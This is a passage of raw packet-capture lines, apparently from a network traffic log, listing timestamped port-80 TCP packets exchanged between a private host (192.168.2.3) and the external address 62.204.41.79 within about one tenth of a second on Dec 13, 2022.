                                              Dec 13, 2022 20:09:14.729332924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.729525089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.729568958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.729649067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.729773998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.729792118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.729886055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.730632067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.730732918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.730834961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.730923891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731015921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731105089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731188059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731277943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731443882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731472969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731556892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731642962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731729031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731817007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.731904030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732000113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732089996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732180119 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732264042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732352018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732439041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732527971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732556105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.732614040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732659101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.732698917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.732709885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732796907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732812881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.732887030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.732970953 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733057022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733100891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733140945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733148098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733159065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733176947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733243942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733249903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733300924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733346939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733438969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733453989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733504057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733525038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733535051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733608961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733656883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733697891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733741999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733788013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733915091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.733943939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733967066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.733985901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734034061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.734179974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.734189987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734227896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734428883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734452963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734471083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734474897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.734474897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.734589100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.734692097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.734709024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734751940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734771013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734827042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.734864950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.734962940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.735095978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.735117912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735184908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735308886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.735337973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735357046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.735434055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735502958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.735625029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735625029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.735668898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735687971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735747099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735748053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.735860109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.735873938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.735995054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.736066103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.736769915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.736864090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.736938953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.736975908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737021923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737036943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737071037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737085104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737097979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737111092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737124920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737175941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737380981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737577915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.737668991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.737793922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.737926960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.738048077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.738176107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.738306046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.738425016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.738549948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.738717079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.738866091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.738985062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.739455938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.739613056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.739769936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.739931107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.740197897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.740197897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.740320921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.740469933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.740592957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.740720034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.740835905 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.740963936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.741154909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.741605997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.741729021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.741818905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.741833925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.741868973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.741986036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742000103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742013931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742038012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.742094040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742211103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742217064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.742347956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.742454052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742480993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.742491961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742618084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.742656946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742693901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742741108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742754936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742770910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.742909908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.742973089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743012905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743052959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743133068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743417025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743453026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743491888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743530989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743690968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743731022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743769884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743855000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.743973017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744010925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744424105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744440079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744456053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744577885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744625092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744771004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744851112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.744889975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745012045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745157003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745193005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745332003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745371103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745495081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745531082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745652914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745743990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745862007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745889902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.745959044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.746093035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.746339083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.747598886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.748053074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.749574900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.749799013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.749968052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.750097036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.750228882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.750356913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.750485897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.750613928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.750641108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.750658035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.750735998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.750745058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.750783920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.750870943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.750906944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.750998974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.751020908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.751126051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.751252890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.751380920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.751519918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.751663923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.755326986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.755454063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.755590916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.755724907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.755848885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.755970955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.756084919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.756217957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.756349087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.756479025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.756599903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.756726027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.763304949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.763468981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.763606071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.763693094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.763788939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.782908916 CET804973862.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.784159899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.784378052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.784619093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.784722090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.784883022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.785104036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.785226107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.785408020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.785478115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.785645962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.785826921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786007881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786298990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786781073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786840916 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786860943 CET804973862.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786891937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786911964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786953926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.786983967 CET4973880192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.787091970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787107944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787152052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787291050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787599087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787620068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787636042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787719965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787868977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.787995100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788116932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788151979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788208961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788227081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788356066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788479090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788557053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788635969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.788671970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.789025068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791273117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791301012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791316032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791404963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791429996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791701078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791758060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791884899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.791958094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792171001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792192936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792243958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792347908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792403936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792481899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792561054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792637110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792814970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.792876959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793056011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793072939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793162107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793279886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793317080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793358088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793481112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793598890 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793724060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793939114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793960094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.793977976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.794084072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.794112921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.794337034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.794545889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.794585943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.794682026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.795080900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.795100927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.795111895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.795207024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.795500994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.795603991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.795900106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.795970917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.796060085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.796160936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.796354055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.796427965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.798402071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.798448086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.798485994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.798605919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.798773050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.798907995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.798964024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.799171925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.799335003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.799381018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.800107956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.800132036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.800215960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.800319910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.800544977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.800585032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.800631046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.800651073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.800717115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.800745010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.800759077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.800883055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.800936937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.801004887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.801058054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.801125050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.801176071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.801258087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.801377058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.801507950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.801567078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.801599026 CET804973662.204.41.79192.168.2.3
